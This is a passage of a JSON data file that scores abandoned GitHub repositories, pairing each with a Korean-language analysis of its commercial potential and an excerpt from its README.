Status](https://img.shields.io/badge/version-0.4.4-green.svg)]()\n\n## What is xLearn?\n\nxLearn is a ***high performance***, ***easy-to-use***, and ***scalable*** machine learning package that contains linear model (LR), factorization machines (FM), and field-aware factorization machines (FFM), all of which can be used to solve large-scale machine learning problems. xLearn is especially useful for solving machine learning problems on large-scale sparse data. Many real world datasets deal with high dimensional sparse feature vectors like a recommendation system where the number of categories and users is on the order of millions. In that case, if you are the user of liblinear, libfm, and libffm, now xLearn is your another better choice.\n\n[Get Started! (English)](http://xlearn-doc.readthedocs.io/en/latest/index.html)\n\n[Get St","composite_score":0.5432,"license_safety_tag":"safe"},{"name":"fluxcd/flux","github_url":"https://github.com/fluxcd/flux","stars":13,"language":"Go","license":"Apache-2.0","abandonment_months":43,"description":"# Flux CD 저장소 분석\n\n## 왜 보물인가\n소프트웨어 배포를 자동화하고 관리하는 오픈소스 도구로, 기업의 IT 운영 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 배포 자동화 플랫폼으로, 개발팀이 코드 변경 시 자동으로 서버에 반영되도록 제공\n2. **내부 업무 도구**: 대기업의 IT 팀","readme_excerpt":"# Flux v1\n\nThis repository contains the source code of Flux Legacy (v1).\n\nFlux v1 has reached **end of life** and has been replaced by [fluxcd/flux2](https://github.com/fluxcd/flux2)\nand its controllers entirely.\n\nIf you consider using Flux, please take a look at <https://fluxcd.io/flux/get-started>\nto get started with v2.\n\nIf you are on Flux Legacy, please follow the [migration guide](https://fluxcd.io/flux/migration).\nIf you need hands-on help migrating, you can contact one of the companies\n[listed here](https://fluxcd.io/support/#my-employer-needs-additional-help).\n\n## History\n\nFlux was initially developed by [Weaveworks](https://weave.works) and made open source in 2016.\nOver the years the community around Flux & GitOps grew and in 2019 Weaveworks decided to donate\nthe project to [CNCF](https://cncf.io).\n\nAfter joining CNCF, the Flux project has seen [massive adoption](https://fluxcd.io/adopters/)\nby various organisations. With adoption came a wave of feature requests\nthat required","composite_score":0.5429,"license_safety_tag":"safe"},{"name":"TroJanzHEX/Unlimited-Filter-Bot","github_url":"https://github.com/TroJanzHEX/Unlimited-Filter-Bot","stars":10,"language":"Python","license":"MIT","abandonment_months":39,"description":"# Unlimited-Filter-Bot 분석 보고서\n\n## 왜 보물인가\n텔레그램 메신저에서 원치 않는 메시지나 사용자를 자동으로 차단해주는 도구로, 온라인 커뮤니티 관리자들이 스팸과 악성 콘텐츠 정리에 소비하는 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 텔레그램 커뮤니티 관리 플랫폼으로 월 구독 형태로 운영","readme_excerpt":"# Unlimited Filter Bot\n\n\n<p align=\"center\">\n  <a href=\"https://www.python.org\">\n    <img src=\"http://ForTheBadge.com/images/badges/made-with-python.svg\">\n\n  </a>\n</p>\n<p align=\"center\">\n  <a href=\"https://github.com/TroJanzHEX/Unlimited-Filter-Bot/stargazers\">\n    <img src=\"https://img.shields.io/github/stars/TroJanzHEX/Unlimited-Filter-Bot?style=social\">\n\n  </a>\n  \n  <a href=\"https://github.com/TroJanzHEX/Unlimited-Filter-Bot/fork\">\n    <img src=\"https://img.shields.io/github/forks/TroJanzHEX/Unlimited-Filter-Bot?label=Fork&style=social\">\n\n  </a>  \n</p>\n\n[![TroJanz](https://img.shields.io/badge/TroJanzHEX-Channel-orange?style=for-the-badge&logo=telegram)](https://telegram.dog/TroJanzHEX)  \nㅤㅤㅤㅤㅤㅤㅤ  \n[![TroJanz](https://img.shields.io/badge/TroJanzHEX-Support-red?style=flat&logo=telegram)](https://telegram.dog/TroJanzSupport)  [![TroJanz](https://img.shields.io/badge/TroJanzHEX-Website-red?style=flat&logo=CodersRank)](https://TroJanzHEX.me)  \nㅤㅤㅤㅤㅤㅤㅤ  \n[![MIT license](https://img.shiel","composite_score":0.5426,"license_safety_tag":"safe"},{"name":"Kayzaks/HackingNeuralNetworks","github_url":"https://github.com/Kayzaks/HackingNeuralNetworks","stars":11,"language":"Python","license":"MIT","abandonment_months":76,"description":"","readme_excerpt":"# Hacking Neural Networks: A Short Introduction\n \n<span style=\"color:red\">**Disclaimer: This article and all the associated exercises are for educational purposes only.**</span>\n\n\nThis is a short introduction on methods that use neural networks in an offensive manner (bug hunting, shellcode obfuscation, etc.) and how to exploit neural networks found in the wild (information extraction, malware injection, backdooring, etc.).\n\nMost of the methods presented are accompanied by an exercise found in this repo. The full article can be found here in '[Article.pdf](Article.pdf)' or on arXiv ([arXiv:1911.07658](https://arxiv.org/pdf/1911.07658.pdf)). \n\n\n---\n\n## Setup\n\n### Python and pip\n\nDownload and install Python3 and its package installer pip using a package manager or directly from the website https://www.python.org/downloads/. \n\n### Editor \n\nAn editor is required to work with the code, preferably one that allows code highlighting for Python. Vim/Emacs will do. As a reference, all exercises ","composite_score":0.5424,"license_safety_tag":"safe"},{"name":"limetext/lime","github_url":"https://github.com/limetext/lime","stars":7,"language":"","license":"bsd-2-clause","abandonment_months":66,"description":"# Lime Text 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 커스터마이징할 수 있는 텍스트 편집기로, 개발자들이 자신의 필요에 맞게 기능을 추가하거나 수정할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **코드 편집 SaaS**: 웹 기반 프로그래밍 학습 플랫폼에 내장된 편집기로 제공\n2. **기업 문서 도구**: 회사 내부의 설정 파일이나 로그를 ","readme_excerpt":"[![Bountysource Bounties](https://www.bountysource.com/badge/team?team_id=8742&style=bounties_received)](https://www.bountysource.com/teams/limetext/issues?utm_source=limetext&utm_medium=shield&utm_campaign=bounties_received)\n[![Bountysource Raised](https://www.bountysource.com/badge/team?team_id=8742&style=raised)](https://www.bountysource.com/teams/limetext?utm_source=limetext&utm_medium=shield&utm_campaign=raised)\n\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/limetext/lime)\n\n\n# lime\n\nWelcome to the meta project for Lime.\n\nFor the backend, please see [limetext/lime-backend](https://github.com/limetext/lime-backend).\n\nThere are also three frontends currently in development: [limetext/lime-qml](https://github.com/limetext/lime-qml), [limetext/lime-termbox](https://github.com/limetext/lime-termbox), and [limetext/lime-html](https://github.com/limetext/lime-html).\n\n\n# Status\n\nThe frontends are **not** ready to replace your favourite editor, but the backend isn'","composite_score":0.5421,"license_safety_tag":"safe"},{"name":"bogde/HX711","github_url":"https://github.com/bogde/HX711","stars":980,"language":"C++","license":"MIT","abandonment_months":37,"description":"# HX711 저장소 분석\n\n## 왜 보물인가\n저울이나 무게를 측정하는 센서를 쉽게 연결할 수 있는 실용적인 도구로, 하드웨어 프로젝트에서 매우 많이 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **IoT 무게 측정 SaaS**: 스마트 저울이나 배송 무게 자동 측정 시스템을 클라우드로 제공하는 서비스\n2. **내부 업무 도구**: 제조업체의 품질 ","readme_excerpt":"# HX711\nAn Arduino library to interface the [Avia Semiconductor HX711 24-Bit Analog-to-Digital Converter (ADC)]\nfor reading load cells / weight scales.\n\nIt supports the architectures `atmelavr`, `espressif8266`, `espressif32`,\n`atmelsam`, `teensy` and `ststm32` by corresponding [PlatformIO] targets.\n\n[Avia Semiconductor HX711 24-Bit Analog-to-Digital Converter (ADC)]: http://www.dfrobot.com/image/data/SEN0160/hx711_english.pdf\n[PlatformIO]: https://platformio.org/\n\n\n## Synopsis\n\n### Blocking mode\nThe library is usually used in blocking mode, i.e. it will wait for the\nhardware becoming available before returning a reading.\n\n```c++\n#include \"HX711.h\"\nHX711 loadcell;\n\n// 1. HX711 circuit wiring\nconst int LOADCELL_DOUT_PIN = 2;\nconst int LOADCELL_SCK_PIN = 3;\n\n// 2. Adjustment settings\nconst long LOADCELL_OFFSET = 50682624;\nconst long LOADCELL_DIVIDER = 5895655;\n\n// 3. Initialize library\nloadcell.begin(LOADCELL_DOUT_PIN, LOADCELL_SCK_PIN);\nloadcell.set_scale(LOADCELL_DIVIDER);\nloadcell.set","composite_score":0.5418,"license_safety_tag":"safe"},{"name":"gzr2017/ImageProcessing100Wen","github_url":"https://github.com/gzr2017/ImageProcessing100Wen","stars":6,"language":"Python","license":"MIT","abandonment_months":57,"description":"# ImageProcessing100Wen 분석\n\n## 왜 보물인가\n사진이나 영상을 자동으로 보정하고 개선하는 기술을 100개의 실무 예제로 배울 수 있는 실전 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 SaaS**: 일반인이 사용하는 온라인 사진 보정 도구(필터, 밝기 조정 등)\n2. **전자상거래 내부 도구**: 쇼핑몰 상품 사진을","readme_excerpt":"# 图像处理 100 问！！\n\n> * 日本语本当苦手，==翻译出错还请在issue指正或直接发起 PR。代码算法方面的问题请往[原repo](https://github.com/yoyoyo-yo/Gasyori100knock)提。==现阶段我并没有做这些题目（捂脸），只是翻译而已，因此算法细节可能没有翻译到位。不太好翻译的地方我也会在一定程度上意译~~自行发挥~~，请各位谅解。后续在写代码的途中会对翻译有所更正。我会尽量附上英文术语，有翻译不清楚的地方还请参照原文、英语及代码。\n>\n> * 关于$\\LaTeX$公式渲染问题：\n>   * 在线阅读建议安装[MathJax Plugin for Github](https://chrome.google.com/webstore/detail/mathjax-plugin-for-github/ioemnmodlmafdkllaclgeombjnmnbima)插件获得~~其实不太~~良好的公式阅读体验；\n>   * 离线阅读建议使用可以渲染$\\LaTeX$公式的Markdown编辑器/阅读器，如[Typora](https://www.typora.io/)（我是用这个编写和转换PDF的）和[MWeb](https://zh.mweb.im/)。VSCode使用者建议安装[Markdown All in One](https://marketplace.visualstudio.com/items?itemName=yzhang.markdown-all-in-one)插件渲染$\\LaTeX$公式；\n>   * 各个README文件在完成基本校对之后会转为PDF文件。PDF文件阅读效果最佳。\n>\n> * 有签名戳`——gzr`的引用部分和脚注都是译注。译注可能会打扰大家阅读，请各位谅解。\n>\n> 感谢！\n>\n> ——gzr\n\n***English is here*** (KuKuXia translates into English)\n\n> https://github.com/KuKuXia/Image_Processing_100_Questions\n\n***Chinese is here***  (gzr2017, my ex-colleague, translates into Chinese)\n\n> ","composite_score":0.5418,"license_safety_tag":"safe"},{"name":"zalmoxisus/redux-devtools-extension","github_url":"https://github.com/zalmoxisus/redux-devtools-extension","stars":9,"language":"JavaScript","license":"mit","abandonment_months":31,"description":"","readme_excerpt":"⚠️⚠️⚠️🚨🚨🚨⚠️⚠️⚠️\n## This repo is no longer the home of the redux-devtools-extension. The new home is https://github.com/reduxjs/redux-devtools. Please file your issues and PRs there. \n⚠️⚠️⚠️🚨🚨🚨⚠️⚠️⚠️\n\n# Redux DevTools Extension\n\n[![Join the chat at https://gitter.im/zalmoxisus/redux-devtools-extension](https://badges.gitter.im/zalmoxisus/redux-devtools-extension.svg)](https://gitter.im/zalmoxisus/redux-devtools-extension?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=round-square)](http://makeapullrequest.com)\n[![OpenCollective](https://opencollective.com/redux-devtools-extension/backers/badge.svg)](#backers) \n[![OpenCollective](https://opencollective.com/redux-devtools-extension/sponsors/badge.svg)](#sponsors)\n\n![Demo](https://cloud.githubusercontent.com/assets/7957859/18002950/aacb82fc-6b93-11e6-9ae9-609862c18302.png)\n\n## Installation\n\n### 1. For Chrome\n - from [Chrome Web Store]","composite_score":0.5415,"license_safety_tag":"safe"},{"name":"solana-labs/dapp-scaffold","github_url":"https://github.com/solana-labs/dapp-scaffold","stars":14,"language":"TypeScript","license":"Apache-2.0","abandonment_months":26,"description":"# solana-labs/dapp-scaffold 분석\n\n## 왜 보물인가\n솔라나 블록체인으로 암호화폐 서비스를 만들고 싶은 개발자들을 위해 필요한 기본 틀을 미리 준비해둔 것으로, 처음부터 모든 것을 직접 만들지 않아도 된다는 점이 핵심입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 지갑 관리 앱이나 토큰 거래 플랫폼처럼 구독료","readme_excerpt":"\n# Solana dApp Scaffold Next\n\nThe Solana dApp Scaffold repos are meant to house good starting scaffolds for ecosystem developers to get up and running quickly with a front end client UI that integrates several common features found in dApps with some basic usage examples. Wallet Integration. State management. Components examples. Notifications. Setup recommendations.\n\nResponsive                     |  Desktop\n:-------------------------:|:-------------------------:\n![](scaffold-mobile.png)  |  ![](scaffold-desktop.png)\n\n## Getting Started\n\nThis is a [Next.js](https://nextjs.org/) project bootstrapped with [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app).\n\nThe responsive version for wallets and wallet adapter may not function or work as expected for mobile based on plugin and wallet compatibility. For more code examples and implementations please visit the [Solana Cookbook](https://solanacookbook.com/)\n\n## Installation\n\n```bash\nnpm install\n# or\n","composite_score":0.5409,"license_safety_tag":"safe"},{"name":"phodal/adr","github_url":"https://github.com/phodal/adr","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":21,"description":"# phodal/adr 저장소 분석\n\n## 왜 보물인가\n개발팀의 중요한 의사결정 기록을 체계적으로 관리하여 팀의 일관성 있는 기술 전략을 유지할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기술 팀 협업 플랫폼으로 출시하여, 기업들이 월정액을 내고 의사결정 기록을 클라우드에 저장하도록 제공\n2. **내부 업무 도구","readme_excerpt":"ADR - Architecture Decision Records（轻量级架构决策记录工具）\n===\n\n> ADR - Architecture Decision Records（轻量级架构决策记录工具）\n\n[![Build Status](https://travis-ci.org/phodal/adr.svg?branch=master)](https://travis-ci.org/phodal/adr) [![codecov.io](https://codecov.io/github/phodal/adr/coverage.svg?branch=master)](https://codecov.io/github/phodal/adr?branch=master)  [![Maintainability](https://api.codeclimate.com/v1/badges/5cd05f9857e0a2031ba1/maintainability)](https://codeclimate.com/github/phodal/adr/maintainability)\n\n[![Markdown Improve](https://img.shields.io/badge/markdown--improve-Phodal-blue.svg)](https://github.com/phodal/markdown-improve) [![node](https://img.shields.io/node/v/adr.svg)](https://www.npmjs.com/package/adr) [![npm](https://img.shields.io/npm/v/adr.svg)](https://www.npmjs.com/adr)\n\nInspired by [https://github.com/npryce/adr-tools](https://github.com/npryce/adr-tools), but supported Windows.\n\nADR Blogpost: [Documenting Architecture Decisions](http://thinkrelevance.com/blog/2011/11/15/docum","composite_score":0.5409,"license_safety_tag":"safe"},{"name":"ChrisTitusTech/win10script","github_url":"https://github.com/ChrisTitusTech/win10script","stars":5,"language":"PowerShell","license":"MIT","abandonment_months":48,"description":"# ChrisTitusTech/win10script 분석\n\n## 왜 보물인가\nWindows 10 컴퓨터를 빠르고 깔끔하게 정리해주는 자동화 도구로, 일반 사용자도 복잡한 수동 작업 없이 PC 성능을 쉽게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 PC 관리 서비스**: IT 담당자들이 여러 직원 컴퓨터를 한 번에 최적화하는 유료 관리 솔","readme_excerpt":"# Ultimate Windows Toolbox\nThis script has evolved and is now improved with a new UI and multiple other fixes @ <https://github.com/ChrisTitusTech/winutil>\n\n## For complete details check out https://christitus.com/windows-tool/\n","composite_score":0.5409,"license_safety_tag":"safe"},{"name":"taki0112/UGATIT","github_url":"https://github.com/taki0112/UGATIT","stars":5,"language":"Python","license":"MIT","abandonment_months":61,"description":"# UGATIT 저장소 분석\n\n## 왜 보물인가\n사진을 마치 다른 화풍으로 그린 그림처럼 변환해주는 AI 기술로, 패션·미용·엔터테인먼트 산업에서 즉시 상용화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 온라인 사진 필터 플랫폼**\n스마트폰 사진을 유화, 만화, 스케치 등 다양한 스타일로 변환해주는 웹/앱 서비스로 운영 가능합니다","readme_excerpt":"## U-GAT-IT &mdash; Official TensorFlow Implementation (ICLR 2020)\n### : Unsupervised Generative Attentional Networks with Adaptive Layer-Instance Normalization for Image-to-Image Translation\n\n<div align=\"center\">\n  <img src=\"./assets/teaser.png\">\n</div>\n\n### [Paper](https://arxiv.org/abs/1907.10830) | [Official Pytorch code](https://github.com/znxlwm/UGATIT-pytorch)\nThis repository provides the **official Tensorflow implementation** of the following paper:\n\n> **U-GAT-IT: Unsupervised Generative Attentional Networks with Adaptive Layer-Instance Normalization for Image-to-Image Translation**<br>\n> **Junho Kim (NCSOFT)**, Minjae Kim (NCSOFT), Hyeonwoo Kang (NCSOFT), Kwanghee Lee (Boeing Korea)\n>\n> **Abstract** *We propose a novel method for unsupervised image-to-image translation, which incorporates a new attention module and a new learnable normalization function in an end-to-end manner. The attention module guides our model to focus on more important regions distinguishing between sour","composite_score":0.5408,"license_safety_tag":"safe"},{"name":"yunjey/StarGAN","github_url":"https://github.com/yunjey/StarGAN","stars":115,"language":"Python","license":"MIT","abandonment_months":65,"description":"# StarGAN 상용화 분석 보고서\n\n## 왜 보물인가\n한 번의 학습으로 여러 종류의 얼굴 변환(나이, 성별, 표정 등)을 동시에 처리할 수 있는 AI 기술로, 기존보다 훨씬 효율적이고 빠릅니다.\n\n## 어디에 쓸 수 있나\n\n**1. 증명사진/프로필 사진 편집 SaaS**\n- 사용자가 업로드한 사진에서 자동으로 최적의 각도, 밝기, 표정으로 변환해주는 구","readme_excerpt":"## StarGAN - Official PyTorch Implementation\n\n**\\*\\*\\*\\*\\* New: StarGAN v2 is available at https://github.com/clovaai/stargan-v2 \\*\\*\\*\\*\\***\n\n<p align=\"center\"><img width=\"100%\" src=\"jpg/main.jpg\" /></p>\n\nThis repository provides the official PyTorch implementation of the following paper:\n> **StarGAN: Unified Generative Adversarial Networks for Multi-Domain Image-to-Image Translation**<br>\n> [Yunjey Choi](https://github.com/yunjey)<sup>1,2</sup>, [Minje Choi](https://github.com/mjc92)<sup>1,2</sup>, [Munyoung Kim](https://www.facebook.com/munyoung.kim.1291)<sup>2,3</sup>, [Jung-Woo Ha](https://www.facebook.com/jungwoo.ha.921)<sup>2</sup>, [Sung Kim](https://www.cse.ust.hk/~hunkim/)<sup>2,4</sup>, [Jaegul Choo](https://sites.google.com/site/jaegulchoo/)<sup>1,2</sup>    <br/>\n> <sup>1</sup>Korea University, <sup>2</sup>Clova AI Research, NAVER Corp. <br>\n> <sup>3</sup>The College of New Jersey, <sup>4</sup>Hong Kong University of Science and Technology <br/>\n> https://arxiv.org/abs/171","composite_score":0.5408,"license_safety_tag":"safe"},{"name":"nusr/hacker-laws-zh","github_url":"https://github.com/nusr/hacker-laws-zh","stars":6,"language":"","license":"MIT","abandonment_months":36,"description":"# nusr/hacker-laws-zh 보물 분석\n\n## 왜 보물인가\n기술 업계의 숨겨진 법칙들을 쉽게 설명하는 중국어 자료로, 스타트업과 개발자들이 실패를 피하고 빠르게 성장하는 데 필요한 지혜를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기술 입문자 대상 온라인 강의 플랫폼에서 구독형 학습 콘텐츠로 판매\n2. **내부 업무 도","readme_excerpt":"[![Build Status](https://travis-ci.org/nusr/hacker-laws-zh.svg?branch=master)](https://travis-ci.org/nusr/hacker-laws-zh)\n\n[hacker-laws](https://github.com/dwmkerr/hacker-laws) 的中文翻译。\n\n对开发人员有用的定律、理论、原则和模式。(Laws, Theories, Principles and Patterns that developers will find useful.)\n\n为了方便阅读，维基百科增加了中文链接。英文链接表示 [hacker-laws](https://github.com/dwmkerr/hacker-laws) 项目尚未完成的主题。\n\n[中国无法访问维基百科说明](gfw.md)\n\n喜欢点 **star** 、关注点 **watch** 、贡献点 **fork** 。翻译错漏之处，欢迎指正！\n\n- [介绍](#介绍)\n- [定律](#定律)\n  - [90-9-1 法则 (90–9–1 Principle or 1% Rule)](#90-9-1-法则-9091-principle-or-1-rule)\n  - [阿姆达尔定律 (Amdahl's Law)](#阿姆达尔定律-amdahls-law)\n  - [破窗效应 (The Broken Windows Theory)](#破窗效应-the-broken-windows-theory)\n  - [布鲁克斯法则 (Brooks's Law)](#布鲁克斯法则-brookss-law)\n  - [CAP 定理 (CAP Theorem or Brewer's Theorem)](#cap-定理-cap-theorem-or-brewers-theorem)\n  - [康威定律 (Conway's Law)](#康威定律-conways-law)\n  - [坎宁汉姆定律 (Cunningham's Law)](#坎宁汉姆定律-cunninghams-law)\n  - [邓巴数字 (Dunbar's Number)](#邓巴数字-dunbars-number)\n  - [邓宁-克鲁格效应 (The Dunning-K","composite_score":0.5405,"license_safety_tag":"safe"},{"name":"dyq086/wepy-mall","github_url":"https://github.com/dyq086/wepy-mall","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":61,"description":"# dyq086/wepy-mall 상용화 분석\n\n## 왜 보물인가\n소규모 온라인 쇼핑몰을 빠르게 만들 수 있는 완성된 기술 템플릿으로, 개발 비용과 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 누구나 쉽게 자신의 쇼핑몰을 만들 수 있는 \"쇼핑몰 빌더\" 플랫폼\n2. **내부 업무 도구**: 중소 소매상인의 재고 관","readme_excerpt":"### 安装（更新） wepy 命令行工具。\n\tyarn: yarn global add wepy-cli \n    npm: npm i wepy-cli -g\n\n### 安装依赖包\n\tyarn / npm install\n\n### 开发实时编译。\n\tyarn  dev / npm run dev\n\n### 生产压缩\n\tyarn  build / npm run build //上传代码时，请先执行此命令，否则会提示包体积过大\n\n\n### 开发使用说明(重要)\n\n1、使用微信开发者工具-->添加项目，项目目录请选择dist目录。\n\n2、微信开发者工具-->项目-->关闭ES6转ES5。 <font color=red>重要：漏掉此项会运行报错。</font> \n\n3、微信开发者工具-->项目-->关闭上传代码时样式自动补全。  <font color=red>重要：某些情况下漏掉此项也会运行报错。</font> \n\n4、微信开发者工具-->项目-->关闭代码压缩上传。  <font color=red>重要：开启后，会导致真机computed, props.sync 等等属性失效。</font> \n\n\n\n### wepy开发文档地址\n\thttps://tencent.github.io/wepy/\n\n### 小程序开发文档\n\thttp://mp.weixin.qq.com/debug/wxadoc/dev/\n\n### 演示地址\n\n打开微信扫一扫\n\n<img src=\"https://github.com/dyq086/wxYuHanStore/blob/master/screenshots/qr.jpg\" width=\"200\" height=\"200\"/> \n\n    \n### 目录结构\n\n    ├── api\n    │   └── api.js              //接口\n    ├── app.wpy                 //入口文件\n    ├── components                  //组件\n    │   ├── address_add.wpy         //新增地址组件\n    │   ├── address_edit.wpy        //编辑地址组件\n    │   ├── address_","composite_score":0.5403,"license_safety_tag":"safe"},{"name":"hemanth/functional-programming-jargon","github_url":"https://github.com/hemanth/functional-programming-jargon","stars":5,"language":"","license":"mit","abandonment_months":32,"description":"# functional-programming-jargon 평가\n\n## 왜 보물인가\n함수형 프로그래밍이라는 복잡한 개념들을 쉽게 정리한 사전 같은 자료로, 개발자들의 학습 곡선을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래밍 입문자를 위한 개념 설명 콘텐츠로 활용\n2. **개발사 내부 교육 도구**: 신입 ","readme_excerpt":"# Functional Programming Jargon\n\nFunctional programming (FP) provides many advantages, and its popularity has been increasing as a result. However, each programming paradigm comes with its own unique jargon and FP is no exception. By providing a glossary, we hope to make learning FP easier.\n\nExamples are presented in JavaScript (ES2015). [Why JavaScript?](https://github.com/hemanth/functional-programming-jargon/wiki/Why-JavaScript%3F)\n\nWhere applicable, this document uses terms defined in the [Fantasy Land spec](https://github.com/fantasyland/fantasy-land).\n\n__Translations__\n* [Portuguese](https://github.com/alexmoreno/jargoes-programacao-funcional)\n* [Spanish](https://github.com/idcmardelplata/functional-programming-jargon/tree/master)\n* [Chinese](https://github.com/shfshanyue/fp-jargon-zh)\n* [Bahasa Indonesia](https://github.com/wisn/jargon-pemrograman-fungsional)\n* [Python World](https://github.com/jmesyou/functional-programming-jargon.py)\n* [Scala World](https://github.com/ikhoon/f","composite_score":0.5403,"license_safety_tag":"safe"},{"name":"30-seconds/30-seconds-of-css","github_url":"https://github.com/30-seconds/30-seconds-of-css","stars":10,"language":"CSS","license":"CC-BY-4.0","abandonment_months":37,"description":"# 30-seconds-of-css 상용화 분석\n\n## 왜 보물인가\n웹사이트를 예쁘게 꾸미는 방법을 쉽게 배울 수 있는 실용적인 레시피 모음으로, 초보자도 따라 하며 배울 수 있는 귀중한 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 디자인 학습 플랫폼 SaaS**\n초보 웹디자이너들을 위한 온라인 강좌 플랫폼으로, 이 저장소의 코드 예제들을 체","readme_excerpt":"> **IMPORTANT NOTICE:**\n>\n> As of May, 2023, all 30-seconds content repositories have been merged into [30-seconds-of-code](https://github.com/30-seconds/30-seconds-of-code).\n>\n> Please watch, star and follow relevant activity there.\n\n[![Logo](/logo.png)](https://30secondsofcode.org/css/p/1)\n\n# 30 seconds of code\n\n> Short CSS code snippets for all your development needs\n\n* Visit [our website](https://30secondsofcode.org) to view our snippet collection.\n* Use the [Search page](https://30secondsofcode.org/search) to find snippets that suit your needs. You can search by name, tag, language or using a snippet's description. Just start typing a term and see what comes up.\n* Browse the [CSS Snippet collection](https://30secondsofcode.org/css/p/1) to see all the snippets in this project or click individual tags at the top of the same page to narrow down your search to a specific tag.\n* Click on each snippet card to view the whole snippet, including code, explanation and examples.\n* You can us","composite_score":0.5401,"license_safety_tag":"unknown"},{"name":"clxering/Effective-Java-3rd-edition-Chinese-English-bilingual","github_url":"https://github.com/clxering/Effective-Java-3rd-edition-Chinese-English-bilingual","stars":11,"language":"","license":"GPL-3.0","abandonment_months":33,"description":"# Effective Java 3판 이중언어판 분석\n\n## 왜 보물인가\n자바 프로그래밍의 모범 사례를 담은 교과서적 저작을 한글과 영문으로 함께 학습할 수 있어, 국내 개발자들이 국제 수준의 코딩 역량을 갖추는 데 직접적으로 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 자바 개발자 양성 과정의 핵심 교재로 구독형 학습 서비스","readme_excerpt":"# Effective-Java-3rd-edition-Chinese-English-bilingual\nEffective Java（第 3 版）各章节的中英文学习参考，希望对 Java 技术的提高有所帮助，欢迎通过 issue 或 pr 提出建议和修改意见。\n\n## 目录（Contents）\n- **Chapter 2. Creating and Destroying Objects（创建和销毁对象）**\n    - [Chapter 2 Introduction（章节介绍）](Chapter-2/Chapter-2-Introduction.md)\n    - [Item 1: Consider static factory methods instead of constructors（考虑以静态工厂方法代替构造函数）](Chapter-2/Chapter-2-Item-1-Consider-static-factory-methods-instead-of-constructors.md)\n    - [Item 2: Consider a builder when faced with many constructor parameters（在面对多个构造函数参数时，请考虑构建器）](Chapter-2/Chapter-2-Item-2-Consider-a-builder-when-faced-with-many-constructor-parameters.md)\n    - [Item 3: Enforce the singleton property with a private constructor or an enum type（使用私有构造函数或枚举类型实施单例属性）](Chapter-2/Chapter-2-Item-3-Enforce-the-singleton-property-with-a-private-constructor-or-an-enum-type.md)\n    - [Item 4: Enforce noninstantiability with a private constructor（用私有构造函数实施不可实例化）](Chapter-2/Chapter-2-Item-4-Enforce-noninstant","composite_score":0.5398,"license_safety_tag":"restricted"},{"name":"akveo/kittenTricks","github_url":"https://github.com/akveo/kittenTricks","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":27,"description":"# kittenTricks 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 사용할 수 있는 스마트한 앱 템플릿으로, 모바일 앱을 빠르게 만들고 싶은 개발자들의 시간과 비용을 획기적으로 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 이 템플릿을 기반으로 자신들의 비즈니스 앱을 빠르게 출시하고 초기 고객을 확보하는 데 활용\n","readme_excerpt":"# Kitten Tricks [<img src=\"https://i.imgur.com/oMcxwZ0.png\" alt=\"Eva Design System\" height=\"20px\" />][link:eva] [![Build Status][badge:github-actions]][link:github-actions] [![runs with expo][badge:expo]][link:expo] [![Netlify Status][badge:netlify]][link:netlify]\n\n\nThis perfect starter kit is an app based on React Native and [**UI Kitten library**][link:ui-kitten] with Light and Dark themes support. It’s completely free and Open Source. \nCompose the application from available screens, add backend integration and you will end up with A-grade cross-platform mobile application.\nThe themes can be changed in the runtime, without any need of reloading the application.\n\nDownload a live Demo published on both [App Store][link:app-store] and [Google Play][link:google-play]\n or simply run it yourself by cloning a GitHub repo. \n\n![Kitten Material](https://camo.githubusercontent.com/f0487d92194f3c685213539c53e9784113cd8a4b/68747470733a2f2f692e696d6775722e636f6d2f58384f344748622e706e67)\n\n![Preview","composite_score":0.5398,"license_safety_tag":"safe"},{"name":"nuxt/framework","github_url":"https://github.com/nuxt/framework","stars":17,"language":"","license":"unknown","abandonment_months":38,"description":"# Nuxt Framework 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 복잡한 작업을 자동으로 처리해주는 도구로, 개발자들의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 프로젝트 관리, 회계 소프트웨어, CRM 시스템 등 기업용 웹앱 개발에 활용\n2. **내부 업무 도구**: 대기업","readme_excerpt":"# 🚧 Repository update 🚧\n\nThe repository for Nuxt 3 has updated to be https://github.com/nuxt/nuxt - please raise new issues, discussions and pull requests there 🙏\n\nFor progress you can follow https://github.com/nuxt/framework/issues/10147, and you can read more about our plans [in the Nuxt 2023 vision](https://nuxt.com/vision-2023).\n\n<hr>\n\n[![Nuxt banner](./.github/assets/banner.png)](https://nuxt.com)\n\n# 👋 Welcome to Nuxt\n\n\nNuxt's goal is to make web development intuitive and performant, with a great developer experience.<br>Learn more in the ['What is Nuxt?'](https://nuxt.com/docs/getting-started/introduction) section of our documentation.\n\n\n <p>\n  <a href=\"https://www.npmjs.com/package/nuxt\"><img 